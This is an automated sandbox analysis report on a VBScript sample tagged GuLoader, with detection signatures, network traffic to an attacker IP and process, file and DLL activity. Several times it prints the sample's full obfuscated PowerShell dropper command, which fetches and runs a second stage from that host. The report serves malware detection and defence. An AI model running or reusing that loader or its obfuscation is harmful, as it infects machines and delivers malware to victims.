Windows Analysis Report
transferencia.vbs

Overview

General Information

Sample name:	transferencia.vbs
Analysis ID:	1524803
MD5:	c68010fc942eef8e8868e5d3197aadc8
SHA1:	964fa94fcbce9a5a0499672e881b271530c7e1fa
SHA256:	08b753161a621a8235016b94f3a8c68417a8907abda998f84a4de8687a515bf4
Tags:	GuLoadervbsuser-abuse_ch
Infos:

Detection

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

VBScript performs obfuscated calls to suspicious functions

Yara detected Powershell download and execute

AI detected suspicious sample

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: transferencia.vbs

Virustotal: Detection: 14%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.6% probability

Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: powershell.exe, 00000002.00000002.3349546170.000001BF32E94000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.2053986258.0000021294821000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2045877123.0000021294621000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000002.00000002.3349546170.000001BF32E94000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ion.pdb source: powershell.exe, 00000002.00000002.3349546170.000001BF32E29000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdblz[ source: powershell.exe, 00000002.00000002.3350719704.000001BF33118000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 91.109.20.161Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 91.109.20.161Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161

Source: global traffic	HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 91.109.20.161Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 91.109.20.161Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive

Source: powershell.exe, 00000002.00000002.3327025092.000001BF1CA44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3327025092.000001BF1C6D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3327025092.000001BF1C628000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.109.20.161
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1CA44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3327025092.000001BF1C6EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.109.20.161(
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.109.20.161/Hestebremsen.chmP
Source: powershell.exe, 00000002.00000002.3346421331.000001BF2AC33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1AA81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1AA81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1B878000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.3346421331.000001BF2AC33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer:Rej :MuniT Taml BolsKamf1Noci2I.fl ');$Ugenummer=$Salamandrine[0];$Hexactinellid40=(Opbrugets52 'Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ');ggepuncherne ($Hexactinellid40);ggepuncherne (Opbrugets52 ' S,n$FloaGBe orIntruhawkiZ.opnKonfeGirl.MohaH IsoePseuaMudcdRetseQ.adrArris inn[ Por$Fo dbFr siuklalcomplOut,a xcer .ond utukCharuPilegKos.lTo.ve.nto]Frek=
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer:Rej :MuniT Taml BolsKamf1Noci2I.fl ');$Ugenummer=$Salamandrine[0];$Hexactinellid40=(Opbrugets52 'Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ');ggepuncherne ($Hexactinellid40);ggepuncherne (Opbrugets52 ' S,n$FloaGBe orIntruhawkiZ.opnKonfeGirl.MohaH IsoePseuaMudcdRetseQ.adrArris inn[ Por$Fo dbFr siuklalcomplOut,a xcer .ond utukCharuPilegKos.lTo.ve.nto]Frek=			Jump to behavior

Java / VBScript file with very long strings (likely obfuscated code)

Source: transferencia.vbs

Initial sample: Strings found which are bigger than 50

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 6062
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 6062			Jump to behavior

Source: classification engine

Classification label: mal88.expl.evad.winVBS@4/3@0/1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Dorgens.Uns

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5248:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xlpl1eip.t5n.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: transferencia.vbs

Virustotal: Detection: 14%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer:Rej :MuniT Taml BolsKamf1Noci2I.fl ');$Ugenummer=$Salamandrine[0];$Hexactinellid40=(Opbrugets52 'Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ');ggepuncherne ($Hexactinellid40);ggepuncherne (Opbrugets52 ' S,n$FloaGBe orIntruhawkiZ.opnKonfeGirl.MohaH IsoePseuaMudcdRetseQ.adrArris inn[ Por$Fo dbFr siuklalcomplOut,a xcer .ond utukCharuPilegKos.lTo.ve.nto]Frek=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer:Rej :MuniT Taml BolsKamf1Noci2I.fl ');$Ugenummer=$Salamandrine[0];$Hexactinellid40=(Opbrugets52 'Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ');ggepuncherne ($Hexactinellid40);ggepuncherne (Opbrugets52 ' S,n$FloaGBe orIntruhawkiZ.opnKonfeGirl.MohaH IsoePseuaMudcdRetseQ.adrArris inn[ Por$Fo dbFr siuklalcomplOut,a xcer .ond utukCharuPilegKos.lTo.ve.nto]Frek=	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
